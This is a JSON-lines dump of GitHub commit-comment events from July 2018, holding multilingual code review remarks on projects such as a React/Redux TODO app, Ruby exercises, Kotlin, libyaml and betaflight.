{"id":"7982122752","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747651,"position":57,"line":46,"path":"src/reducers/posts.js","commit_id":"95a8351ba15d3dc5d72fc06a11e588527f999c27","created_at":"2018-07-18T10:42:21Z","updated_at":"2018-07-18T10:42:21Z","author_association":"NONE","body":"Думаю це зайве в immutable пихати ще один immutable."}},"created_at":"2018-07-18T10:42:21Z"}
{"id":"7982125208","type":"CommitCommentEvent","actor":{"login":"kevbite"},"repo":{"name":"yorkdayofcode/yorkdayofcode.github.io"},"payload":{"comment":{"id":29747655,"position":4,"line":10,"path":"package.json","commit_id":"1f8c8c1a7efd8ef571031887c1657ec36390ca3b","created_at":"2018-07-18T10:42:53Z","updated_at":"2018-07-18T10:42:53Z","author_association":"MEMBER","body":"I like it, a dependency to set environment variables, which has then 2 dependencies and then these have 5 dependencies. 👍 "}},"created_at":"2018-07-18T10:42:53Z"}
{"id":"7982126707","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29747659,"position":14,"line":13,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T10:43:12Z","updated_at":"2018-07-18T10:43:12Z","author_association":"OWNER","body":"ok, i wasn't aware of what `this` could provide. i'll read up. ty. yes, you're right it is a before.\r\n\r\n"}},"created_at":"2018-07-18T10:43:12Z"}
{"id":"7982129941","type":"CommitCommentEvent","actor":{"login":"max-kammerer"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29747666,"position":15,"line":935,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ImplementationBodyCodegen.java","commit_id":"88a238ec799d25c9d0dd5fabff3c98b0671d2def","created_at":"2018-07-18T10:43:54Z","updated_at":"2018-07-18T10:43:54Z","author_association":"CONTRIBUTOR","body":"it's best to rename objectWithBackingFieldsInOuter -> classCompanionWithBackingFieldsInOuter\r\nisCompanionObjectWithBackingFieldsInOuter() -> \r\nisClassCompanionObjectWithBackingFieldsInOuter()"}},"created_at":"2018-07-18T10:43:54Z"}
{"id":"7982130121","type":"CommitCommentEvent","actor":{"login":"Lauszus"},"repo":{"name":"felis/USB_Host_Shield_2.0"},"payload":{"comment":{"id":29747667,"position":3,"line":23,"path":"examples/Bluetooth/BTHID/BTHID.ino","commit_id":"a31cc4258549b4d9d92df4f72bd6f4394fc90274","created_at":"2018-07-18T10:43:57Z","updated_at":"2018-07-18T10:43:57Z","author_association":"COLLABORATOR","body":"@mohmed1500 ?"}},"created_at":"2018-07-18T10:43:57Z"}
{"id":"7982130735","type":"CommitCommentEvent","actor":{"login":"koutinho"},"repo":{"name":"moq/moq4"},"payload":{"comment":{"id":29747668,"position":null,"line":null,"path":null,"commit_id":"73ceb404bc8a40e58998576724643a02f1f936e9","created_at":"2018-07-18T10:44:04Z","updated_at":"2018-07-18T10:44:04Z","author_association":"NONE","body":"According to that [rules](https://webcache.googleusercontent.com/search?q=cache:BWJAIJ2RalwJ:https://www.codeproject.com/Articles/990/Understanding-Classic-COM-Interoperability-With-NE+&cd=7&hl=ru&ct=clnk&gl=ru) (Mapping method parameter keywords in C# to IDL's Directional attributes section) and [MSDN description](https://docs.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2008/77e6taeh(v=vs.90)) about Directional Attributes, the c# 'out' method parameter keyword maps to only [out] directional attribute. But in the current implementation if the parameter hase [in,out] directional attributes the Moq framework is gonna take it as 'out' parameter, which is wrong, because according to the rules in the article and msdn reference i posted above it gotta take it as 'ref' parameter, not the out. This situation may ocuur for example when you try to mock the com interface, which has a method with [in,out] directional attributes in com layer. In interop assembly this method wil be presented as 'ref' parameter, but moq framework is gonna see it as 'out' therefore you are not gonna be able to mock this method propperly and use it unit tests. So when determining the 'out' parameter we need to see not only that 'out' directional attribute is present, but that 'In' directional attribute is not present or otherwise it is the 'ref' parameter not the 'out'. "}},"created_at":"2018-07-18T10:44:04Z"}
{"id":"7982131635","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"mrostecki/gomountinfo"},"payload":{"comment":{"id":29747669,"position":4,"line":4,"path":"AUTHORS","commit_id":"b940d7c3011df673a3103801c563883740ae0a85","created_at":"2018-07-18T10:44:15Z","updated_at":"2018-07-18T10:44:15Z","author_association":"NONE","body":"`s/getmountinfo/gomountinfo` ?"}},"created_at":"2018-07-18T10:44:15Z"}
{"id":"7982132314","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29747671,"position":17,"line":16,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T10:44:24Z","updated_at":"2018-07-18T10:44:24Z","author_association":"OWNER","body":"I've got this now `assert.isAtLeast(accounts.length, 4, \"Enough accounts are available\");`"}},"created_at":"2018-07-18T10:44:24Z"}
{"id":"7982133380","type":"CommitCommentEvent","actor":{"login":"omerabufara"},"repo":{"name":"omerabufara/VrProjects"},"payload":{"comment":{"id":29747672,"position":null,"line":null,"path":null,"commit_id":"50db7a139afaf78e2c879b266aee4b7558dd8d96","created_at":"2018-07-18T10:44:36Z","updated_at":"2018-07-18T10:44:36Z","author_association":"OWNER","body":"something "}},"created_at":"2018-07-18T10:44:36Z"}
{"id":"7982133535","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747673,"position":15,"line":15,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T10:44:39Z","updated_at":"2018-07-18T10:44:39Z","author_association":"NONE","body":"проверка неплохая, но можно просто to_f, метод тогда вернет 0.0 если будет невалидный float"}},"created_at":"2018-07-18T10:44:39Z"}
{"id":"7982134846","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29747677,"position":26,"line":22,"path":"test/tests.js","commit_id":"536b010e5f251f7262d2ec4bb1f317704c34876b","created_at":"2018-07-18T10:44:56Z","updated_at":"2018-07-18T10:44:56Z","author_association":"OWNER","body":"cleaned up"}},"created_at":"2018-07-18T10:44:56Z"}
{"id":"7982137300","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29747686,"position":18,"line":14,"path":"testing/npapi-vlc/APKBUILD","commit_id":"ee7427edeb31f6b18e88ad49fd0349f5642205b5","created_at":"2018-07-18T10:45:28Z","updated_at":"2018-07-18T10:45:28Z","author_association":"MEMBER","body":"Sigh, GitLab allows to download tarball for any commit, e.g.: https://code.videolan.org/videolan/libvlcpp/-/archive/d1b6a9019d2b4d6779280f4673401014949353f3.tar.gz."}},"created_at":"2018-07-18T10:45:28Z"}
{"id":"7982138608","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747690,"position":12,"line":28,"path":"src/components/post/Post.js","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T10:45:46Z","updated_at":"2018-07-18T10:45:46Z","author_association":"NONE","body":"disabled={this.props.loading}\r\n\r\nТак буде працювати?"}},"created_at":"2018-07-18T10:45:46Z"}
{"id":"7982144602","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29747701,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-18T10:47:02Z","updated_at":"2018-07-18T10:47:02Z","author_association":"COLLABORATOR","body":"When refactoring : remind of Multi language file. We have big issue with it before.\r\nAnd i think we must «silently» fix some part when import : for example if a Question didn't have primary language : don't import it :) (or delete if after import (unsure if survey fixer fix this)"}},"created_at":"2018-07-18T10:47:02Z"}
{"id":"7982149240","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747708,"position":21,"line":36,"path":"src/reducers/posts.js","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T10:48:01Z","updated_at":"2018-07-18T10:48:01Z","author_association":"NONE","body":"Тут ексепшен вилітає при дабл  клік он деліт.(з постом який щойно був створений)"}},"created_at":"2018-07-18T10:48:01Z"}
{"id":"7982149362","type":"CommitCommentEvent","actor":{"login":"manas-chaudhari"},"repo":{"name":"JoelMarcey/swift-2048"},"payload":{"comment":{"id":29747709,"position":42,"line":42,"path":"ios/swift-2048/ViewController.swift","commit_id":"13272a31ee6dd46dc68b1dcf4eaf16c1a10f5229","created_at":"2018-07-18T10:48:02Z","updated_at":"2018-07-18T10:48:02Z","author_association":"NONE","body":"Can we have an example to show how to navigate back to home page?"}},"created_at":"2018-07-18T10:48:02Z"}
{"id":"7982156953","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29747727,"position":7,"line":175,"path":"src/yaml_private.h","commit_id":"daceeb229fec97fdb19ac93bd0c77664b295b00f","created_at":"2018-07-18T10:49:39Z","updated_at":"2018-07-18T10:49:39Z","author_association":"NONE","body":"I wouldn't drop the parenthesis around the `==` operator here.  `==` has pretty low precedence."}},"created_at":"2018-07-18T10:49:39Z"}
{"id":"7982157037","type":"CommitCommentEvent","actor":{"login":"k-gavrilov"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747728,"position":15,"line":15,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T10:49:40Z","updated_at":"2018-07-18T10:49:40Z","author_association":"OWNER","body":"Но тогда я не  смогу разделить случаи невалидного ввода и нулевого коэффициента, а они должны обрабатываться по разному. Читал по этому поводу, вроде можно вместо монструозного регулярного выражения использовать класс Float, но тогда нужно будет exception обрабатывать."}},"created_at":"2018-07-18T10:49:40Z"}
{"id":"7982158903","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747738,"position":57,"line":46,"path":"src/reducers/posts.js","commit_id":"95a8351ba15d3dc5d72fc06a11e588527f999c27","created_at":"2018-07-18T10:50:05Z","updated_at":"2018-07-18T10:50:05Z","author_association":"OWNER","body":"Просто так навіть в офіційній документації роблять https://facebook.github.io/immutable-js/docs/#/Map/merge ."}},"created_at":"2018-07-18T10:50:05Z"}
{"id":"7982160149","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747746,"position":29,"line":25,"path":"src/reducers/posts.js","commit_id":"95a8351ba15d3dc5d72fc06a11e588527f999c27","created_at":"2018-07-18T10:50:21Z","updated_at":"2018-07-18T10:50:21Z","author_association":"NONE","body":"var?"}},"created_at":"2018-07-18T10:50:21Z"}
{"id":"7982162690","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29747757,"position":null,"line":null,"path":null,"commit_id":"daceeb229fec97fdb19ac93bd0c77664b295b00f","created_at":"2018-07-18T10:50:55Z","updated_at":"2018-07-18T10:50:55Z","author_association":"NONE","body":"This looks fine, other than the minor note about dropping parenthesis around the CHECK_AT macro expansion."}},"created_at":"2018-07-18T10:50:55Z"}
{"id":"7982176258","type":"CommitCommentEvent","actor":{"login":"aniqurrehman"},"repo":{"name":"Xilinx/PYNQ-Networking"},"payload":{"comment":{"id":29747797,"position":null,"line":null,"path":null,"commit_id":"ac33b1ff7ff6159fbf92241227beb8ad06a7778a","created_at":"2018-07-18T10:53:52Z","updated_at":"2018-07-18T10:53:52Z","author_association":"NONE","body":"after installing the libray i am unable to access pynq interface from browser."}},"created_at":"2018-07-18T10:53:52Z"}
{"id":"7982176438","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747798,"position":39,"line":39,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T10:53:54Z","updated_at":"2018-07-18T10:53:54Z","author_association":"NONE","body":"Во-первых, очень сложные условия, нужно стараться избегать множественных elsif\r\nсмысла в ветках b == 0 и c == 0 не вижу, проще будет посчитать дискриминант, а потом проверить:\r\n```\r\nif d > 0\r\n\r\nelsif d == 0\r\n\r\nelse\r\n\r\nend\r\n```\r\nВо-вторых, если значение используется несколько раз, то его нужно сохранить в переменную, а потом использовать ее.\r\n\r\nЗачем `d.abs < 0.000001`?"}},"created_at":"2018-07-18T10:53:54Z"}
{"id":"7982177619","type":"CommitCommentEvent","actor":{"login":"derrickstolee"},"repo":{"name":"stefanbeller/git"},"payload":{"comment":{"id":29747802,"position":null,"line":null,"path":null,"commit_id":"2afb2dbd4b7c55c9257c45b3df18478fbe631f4f","created_at":"2018-07-18T10:54:11Z","updated_at":"2018-07-18T10:54:11Z","author_association":"NONE","body":"@stefanbeller You're missing a `the_repository`/`r` switch inside `register_replace_ref()`. Otherwise I like this commit!"}},"created_at":"2018-07-18T10:54:11Z"}
{"id":"7982180789","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-jissyusei1/meikai_java_2017_02_shida"},"payload":{"comment":{"id":29747808,"position":51,"line":51,"path":"jissyu/src/ensyuu15/En15_8_ArgsCalendar.java","commit_id":"e463f6c8caf775162e0e7b7a52e9a395440d0859","created_at":"2018-07-18T10:54:52Z","updated_at":"2018-07-18T10:54:52Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\ncase文はswitchブロックの中にあるので、インデントに注意しましょう。\r\n"}},"created_at":"2018-07-18T10:54:52Z"}
{"id":"7982184615","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747818,"position":25,"line":25,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T10:55:42Z","updated_at":"2018-07-18T10:55:42Z","author_association":"NONE","body":"Среди разработчиков принято использовать style guide, вот для ruby - https://github.com/rubocop-hq/ruby-style-guide\r\nТогда код будет выглядеть одинаково хорошо)\r\nВ частности посмотри что касается пробелов между операторами"}},"created_at":"2018-07-18T10:55:42Z"}
{"id":"7982185652","type":"CommitCommentEvent","actor":{"login":"adamjez"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29747821,"position":54,"line":1075,"path":"src/DotVVM.Framework/Resources/Scripts/DotVVM.ts","commit_id":"3f4fb5acbe8b943317bedf9bf105664cdd2b026a","created_at":"2018-07-18T10:55:54Z","updated_at":"2018-07-18T10:55:54Z","author_association":"CONTRIBUTOR","body":"Is the check for element `tagName` even necessary? User can place `Events.Click` on almost every DOM element and the behavior should be consist. @exyi "}},"created_at":"2018-07-18T10:55:54Z"}
{"id":"7982189110","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747830,"position":29,"line":25,"path":"src/reducers/posts.js","commit_id":"95a8351ba15d3dc5d72fc06a11e588527f999c27","created_at":"2018-07-18T10:56:39Z","updated_at":"2018-07-18T10:56:39Z","author_association":"OWNER","body":"Чорти попутали. Флешбеки з ES5 . Виправив."}},"created_at":"2018-07-18T10:56:39Z"}
{"id":"7982194019","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-jissyusei1/meikai_java_2017_02_shida"},"payload":{"comment":{"id":29747839,"position":55,"line":55,"path":"jissyu/src/ensyuu15/En15_8_ArgsCalendar.java","commit_id":"e463f6c8caf775162e0e7b7a52e9a395440d0859","created_at":"2018-07-18T10:57:38Z","updated_at":"2018-07-18T10:57:38Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\n課題文としてはありませんが、余分な引数があった場合にどうするかを考えてみましょう。\r\n※上の表示用拡張for文も同じく。"}},"created_at":"2018-07-18T10:57:38Z"}
{"id":"7982198640","type":"CommitCommentEvent","actor":{"login":"phchusei7"},"repo":{"name":"phchusei7/assessment"},"payload":{"comment":{"id":29747846,"position":null,"line":null,"path":null,"commit_id":"4344c7a2e784f97ab4f426a1bc882885f83b1946","created_at":"2018-07-18T10:58:37Z","updated_at":"2018-07-18T10:58:37Z","author_association":"OWNER","body":"4344c7a"}},"created_at":"2018-07-18T10:58:37Z"}
{"id":"7982201427","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747855,"position":24,"line":24,"path":"lesson1/right_triangle.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T10:59:12Z","updated_at":"2018-07-18T10:59:12Z","author_association":"NONE","body":"Это верно, а еще можно использовать встроенные функции ruby (которых огромное множество), например:\r\nhyp = [a, b, c].max\r\nc1, c2 = [a, b, c].min(2)\r\nи будет намного короче\r\n"}},"created_at":"2018-07-18T10:59:12Z"}
{"id":"7982204150","type":"CommitCommentEvent","actor":{"login":"dropsonic"},"repo":{"name":"Acumatica/Acuminator"},"payload":{"comment":{"id":29747858,"position":69,"line":112,"path":"src/Acuminator/Acuminator.Analyzers/Analyzers/DAC/DacDeclarationAnalyzer.cs","commit_id":"9ff4da93875be60288aed9957874039ba1d2fbdd","created_at":"2018-07-18T10:59:45Z","updated_at":"2018-07-18T10:59:45Z","author_association":"COLLABORATOR","body":"I vote for a separate class in Acuminator.Utils."}},"created_at":"2018-07-18T10:59:45Z"}
{"id":"7982205504","type":"CommitCommentEvent","actor":{"login":"MikkelDK"},"repo":{"name":"mathiassmichno/get5-web"},"payload":{"comment":{"id":29747863,"position":null,"line":null,"path":null,"commit_id":"91202afbe43cc02917fe35223d913621a6eebfa5","created_at":"2018-07-18T11:00:03Z","updated_at":"2018-07-18T11:00:03Z","author_association":"NONE","body":"Ey! ;) @mathiassmichno - ved ikke, om du stadigvæk er aktivt. har forsøgt og benytte din \"version\" via docker..men har ikke kunne få det til at virke.. ;) er der en måde, hvor jeg kan kontakte dig på? ^^ "}},"created_at":"2018-07-18T11:00:03Z"}
{"id":"7982206024","type":"CommitCommentEvent","actor":{"login":"k-gavrilov"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747865,"position":39,"line":39,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T11:00:10Z","updated_at":"2018-07-18T11:00:10Z","author_association":"OWNER","body":"@mr-koww \r\n> Зачем d.abs < 0.000001?\r\nПри работе с float может произойти потеря точности, мы получим значение слегка отличное от нуля и пойдем не по той ветке."}},"created_at":"2018-07-18T11:00:10Z"}
{"id":"7982210340","type":"CommitCommentEvent","actor":{"login":"jfsoul"},"repo":{"name":"guardian/identity-admin"},"payload":{"comment":{"id":29747879,"position":22,"line":41,"path":"app/config/Conf.scala","commit_id":"44c9e6337fc27cf07296110aee3827636f51be33","created_at":"2018-07-18T11:00:58Z","updated_at":"2018-07-18T11:00:58Z","author_association":"CONTRIBUTOR","body":"`Stage.fromString(DEV.name).get` === `DEV`?"}},"created_at":"2018-07-18T11:00:58Z"}
{"id":"7982211541","type":"CommitCommentEvent","actor":{"login":"tech98459"},"repo":{"name":"tech98459/ismail"},"payload":{"comment":{"id":29747882,"position":null,"line":null,"path":null,"commit_id":"b77e69d3d28331526ab860bf8aaa17f2d13ac647","created_at":"2018-07-18T11:01:14Z","updated_at":"2018-07-18T11:01:14Z","author_association":"OWNER","body":"i saw it"}},"created_at":"2018-07-18T11:01:14Z"}
{"id":"7982218974","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29747890,"position":7,"line":7,"path":"lesson_1/areaTriagle.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T11:02:47Z","updated_at":"2018-07-18T11:02:47Z","author_association":"NONE","body":"Красная стрелка в конце означает отсутствие пустой строки в конце файла (зачем она нужна поищи на stack overflow). Можно настроить редактор чтобы он следил за этим (и добавлял ее автоматически)"}},"created_at":"2018-07-18T11:02:47Z"}
{"id":"7982220614","type":"CommitCommentEvent","actor":{"login":"rashad2021"},"repo":{"name":"rashad2021/ss"},"payload":{"comment":{"id":29747893,"position":null,"line":null,"path":null,"commit_id":"0d92ec343ee8096425e42656c251b974dd164926","created_at":"2018-07-18T11:03:07Z","updated_at":"2018-07-18T11:03:07Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-18T11:03:07Z"}
{"id":"7982221963","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":29747895,"position":null,"line":null,"path":null,"commit_id":"5d3e247fcbfe33566c6987fe20fae5f36a1cbe9f","created_at":"2018-07-18T11:03:24Z","updated_at":"2018-07-18T11:03:24Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 517](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1928&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Compilation error: Xbim.Geometry.Engine.Tests\\Xbim.Geometry.Engine.Tests.csproj (new) Build time: 00:26:38"}},"created_at":"2018-07-18T11:03:24Z"}
{"id":"7982222130","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29747896,"position":15,"line":15,"path":"lesson_1/discriminant.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T11:03:26Z","updated_at":"2018-07-18T11:03:26Z","author_association":"NONE","body":"Нужно настроить редактор на soft tab (2 пробела)"}},"created_at":"2018-07-18T11:03:26Z"}
{"id":"7982225004","type":"CommitCommentEvent","actor":{"login":"Kayle7777"},"repo":{"name":"PROJECT-1-HACKERS/Project-1-BootCamp"},"payload":{"comment":{"id":29747903,"position":null,"line":null,"path":null,"commit_id":"3c10094219f60204975740577b73c7d23b19a2fb","created_at":"2018-07-18T11:04:02Z","updated_at":"2018-07-18T11:04:02Z","author_association":"CONTRIBUTOR","body":"Interesting... I wasn't thinking we'd do it on a separate HTML page. The idea for the google map thing was just going to be a modal, https://getbootstrap.com/docs/4.0/components/modal/"}},"created_at":"2018-07-18T11:04:02Z"}
{"id":"7982225171","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29747905,"position":12,"line":12,"path":"lesson_1/discriminant.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T11:04:04Z","updated_at":"2018-07-18T11:04:04Z","author_association":"NONE","body":"Рекомендую почитать [ruby style guide](https://github.com/rubocop-hq/ruby-style-guide)\r\nЕсть исключение в пробелах между операторами"}},"created_at":"2018-07-18T11:04:04Z"}
{"id":"7982226508","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29747907,"position":null,"line":null,"path":null,"commit_id":"1db4194d2e1399af776768973e2a1f2e5f4e6ef3","created_at":"2018-07-18T11:04:19Z","updated_at":"2018-07-18T11:04:19Z","author_association":"NONE","body":"Looks good."}},"created_at":"2018-07-18T11:04:19Z"}
{"id":"7982227629","type":"CommitCommentEvent","actor":{"login":"iProgramMC"},"repo":{"name":"cernodile/GTMusicSim"},"payload":{"comment":{"id":29747911,"position":null,"line":null,"path":null,"commit_id":"f6534b9022884f254855439590efa75c7c250dde","created_at":"2018-07-18T11:04:33Z","updated_at":"2018-07-18T11:04:33Z","author_association":"NONE","body":"You sure do :rolleyes:"}},"created_at":"2018-07-18T11:04:33Z"}
{"id":"7982229940","type":"CommitCommentEvent","actor":{"login":"drenkas"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747914,"position":12,"line":28,"path":"src/components/post/Post.js","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T11:05:03Z","updated_at":"2018-07-18T11:05:03Z","author_association":"OWNER","body":"Проблема в тому що this.props.loading запускає анімацію кнопки Edit, тобто якщо this.props.loading використовувати для disable, то під час видалення посту буде відображатись анімація завантаження на кнопці Edit"}},"created_at":"2018-07-18T11:05:03Z"}
{"id":"7982230004","type":"CommitCommentEvent","actor":{"login":"Kayle7777"},"repo":{"name":"PROJECT-1-HACKERS/Project-1-BootCamp"},"payload":{"comment":{"id":29747915,"position":null,"line":null,"path":null,"commit_id":"3c10094219f60204975740577b73c7d23b19a2fb","created_at":"2018-07-18T11:05:04Z","updated_at":"2018-07-18T11:05:04Z","author_association":"CONTRIBUTOR","body":"In the future for all of us, do pull requests onto master, don't push to it.\r\n\r\nMake your own branch and then request to add to it later, I was just making initial folder structure and some issues."}},"created_at":"2018-07-18T11:05:04Z"}
{"id":"7982233036","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29747923,"position":21,"line":21,"path":"lesson_1/discriminant.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T11:05:42Z","updated_at":"2018-07-18T11:05:42Z","author_association":"NONE","body":"Math.sqrt(d) вычисляется дважды, вычислить один раз и записать в переменную, а потом ее использовать"}},"created_at":"2018-07-18T11:05:42Z"}
{"id":"7982237368","type":"CommitCommentEvent","actor":{"login":"IvoPaunov"},"repo":{"name":"AdExNetwork/adex-node"},"payload":{"comment":{"id":29747934,"position":11,"line":17,"path":"mongoConnection.js","commit_id":"fc00603dd1e2317abb4ad330edd13e5ee5f42741","created_at":"2018-07-18T11:06:35Z","updated_at":"2018-07-18T11:06:35Z","author_association":"CONTRIBUTOR","body":"fix this"}},"created_at":"2018-07-18T11:06:35Z"}
{"id":"7982237417","type":"CommitCommentEvent","actor":{"login":"rav-rav"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29747935,"position":9,"line":48,"path":"src/main/sensors/gyroanalyse.c","commit_id":"226e491e119e4fb9b4f7f4aa3295f54a88516008","created_at":"2018-07-18T11:06:36Z","updated_at":"2018-07-18T11:06:36Z","author_association":"NONE","body":"FFT has windowsize/2 = 16 bins with each bin 31.25Hz wide."}},"created_at":"2018-07-18T11:06:36Z"}
{"id":"7982241866","type":"CommitCommentEvent","actor":{"login":"pjotrp"},"repo":{"name":"brainstorm/sambamba"},"payload":{"comment":{"id":29747951,"position":null,"line":null,"path":null,"commit_id":"d3b21a57516ac502978c03d882075d3bcb11aa31","created_at":"2018-07-18T11:07:32Z","updated_at":"2018-07-18T11:07:32Z","author_association":"NONE","body":"Do the tests pass with this new htslib?"}},"created_at":"2018-07-18T11:07:32Z"}
{"id":"7982242334","type":"CommitCommentEvent","actor":{"login":"FTZ1024"},"repo":{"name":"FTZ1024/hello-world"},"payload":{"comment":{"id":29747952,"position":null,"line":null,"path":null,"commit_id":"869d272670d71c418bcb6656371d34c9f1359caf","created_at":"2018-07-18T11:07:37Z","updated_at":"2018-07-18T11:07:37Z","author_association":"OWNER","body":"新的内容！"}},"created_at":"2018-07-18T11:07:37Z"}
{"id":"7982242509","type":"CommitCommentEvent","actor":{"login":"rav-rav"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29747954,"position":8,"line":47,"path":"src/main/sensors/gyroanalyse.c","commit_id":"226e491e119e4fb9b4f7f4aa3295f54a88516008","created_at":"2018-07-18T11:07:40Z","updated_at":"2018-07-18T11:07:40Z","author_association":"NONE","body":"Start of 4 is to high. The lowest frequency you get this way is (4+1)*31.25 == 156.25Hz. Way above the lowest possible center setting of 130Hz."}},"created_at":"2018-07-18T11:07:40Z"}
{"id":"7982242534","type":"CommitCommentEvent","actor":{"login":"IvoPaunov"},"repo":{"name":"AdExNetwork/adex-node"},"payload":{"comment":{"id":29747955,"position":30,"line":55,"path":"models/bids.js","commit_id":"fc00603dd1e2317abb4ad330edd13e5ee5f42741","created_at":"2018-07-18T11:07:40Z","updated_at":"2018-07-18T11:07:40Z","author_association":"CONTRIBUTOR","body":"add some validation for bid.tags to be array - here or in the model setter"}},"created_at":"2018-07-18T11:07:40Z"}
{"id":"7982243775","type":"CommitCommentEvent","actor":{"login":"finp"},"repo":{"name":"aidenkeating/mobile-docs"},"payload":{"comment":{"id":29747962,"position":32,"line":38,"path":"modules/ROOT/pages/_partials/generic-obtaining-the-mobile-sdk-config-file.adoc","commit_id":"48e3ee85d1bb2adc42fc6409dd38fd9963b61656","created_at":"2018-07-18T11:07:57Z","updated_at":"2018-07-18T11:07:57Z","author_association":"NONE","body":"@aidenkeating  I think this doesn't relate to the task we're asking the user to perform\r\nthey've got json on the clipboard and wanna know where to put it. We should tell them and then stop. "}},"created_at":"2018-07-18T11:07:57Z"}
{"id":"7982245330","type":"CommitCommentEvent","actor":{"login":"FTZ1024"},"repo":{"name":"FTZ1024/hello-world"},"payload":{"comment":{"id":29747965,"position":2,"line":2,"path":"README.md","commit_id":"869d272670d71c418bcb6656371d34c9f1359caf","created_at":"2018-07-18T11:08:17Z","updated_at":"2018-07-18T11:08:17Z","author_association":"OWNER","body":"new comment"}},"created_at":"2018-07-18T11:08:17Z"}
